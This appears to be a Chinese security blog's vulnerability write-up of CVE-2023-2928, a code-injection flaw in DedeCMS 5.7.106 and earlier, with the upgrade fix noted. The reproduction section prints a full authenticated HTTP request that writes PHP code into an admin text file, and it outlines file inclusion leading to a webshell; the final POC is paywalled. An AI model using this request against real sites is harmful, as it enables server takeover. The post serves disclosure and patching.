探索网络安全新技术
攀登黑客技术最高峰

CVE-2023-2928:DedeCMS 远程代码执行漏洞POC含复现过程

漏洞描述

Dedecms是一款由上海卓卓网络科技有限公司研发的国产PHP网站内容管理系统,它可以让用户轻松地创建和管理各种类型的网站,如门户、企业、政府等,它具有强大的模板引擎、自定义模型、动静态部署、SEO优化等功能。

DedeCMS 在 5.7.106 及之前版本存在代码注入漏洞。攻击者利用 uploads/dede/article_allowurl_edit.php 文件写入恶意Webshell,在上传功能上传包含该文件,从而进行远程代码执行。

影响范围

DedeCMS <= 5.7.106

修复方案

请使用此产品的用户尽快更新至安全版本

版本升级

版本号:5.7.109

版本链接:https://www.dedecms.com/download

漏洞复现

安装完成之后我们先分析一下代码,通过分析文件/dede/article_allowurl_edit.php发现未对文件内容做任何过滤,会把内容写入到:

/data/admin/allowurl.txt

CVE-2023-2928:DedeCMS 远程代码执行漏洞POC含复现过程-威武网安

先登录网站后台访问此文件如图:

CVE-2023-2928:DedeCMS 远程代码执行漏洞POC含复现过程-威武网安

添加如下内容,在这里,dedecms 安全过滤器通过文件创建被绕过,事实上,文件包含函数没有被过滤,因此它可以用于任意文件包含

CVE-2023-2928:DedeCMS 远程代码执行漏洞POC含复现过程-威武网安

点击确定获得如下数据包:

POST /dede/article_allowurl_edit.php HTTP/1.1
Host: test.dedecms.com
Content-Length: 147
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.dedecms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://test.dedecms.com/dede/article_allowurl_edit.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=qi599qe097mcu4clue4g21cuur; _csrf_name_55fd8b84=350735ebb3676b552853e1e977763390; _csrf_name_55fd8b841BH21ANI1AGD297L1FF21LN02BGE1DNG=4def341c9a4a6d06; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=14bb82ac5695a862; DedeLoginTime=1685262355; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=377beff5871855be; ENV_GOBACK_URL=%2Fdede%2Fcontent_s_list.php
Connection: close

dopost=save&allurls=www.dedecms.com%0D%0Awww.desdev.cn%0D%0Abbs.dedecms.com%0D%0A%3C%3Fphp+phpinfo%28%29%3B%3F%3E&imageField1.x=23&imageField1.y=11

通过/dede/file_manage_control.php文件构造文件包含代码。

POC

温馨提示:本内容仅威武会员可见!【 加入会员

访问根目录下1.php获得shell

CVE-2023-2928:DedeCMS 远程代码执行漏洞POC含复现过程-威武网安

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2023-2928:DedeCMS 远程代码执行漏洞POC含复现过程》
文章链接:https://www.wevul.com/1278.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册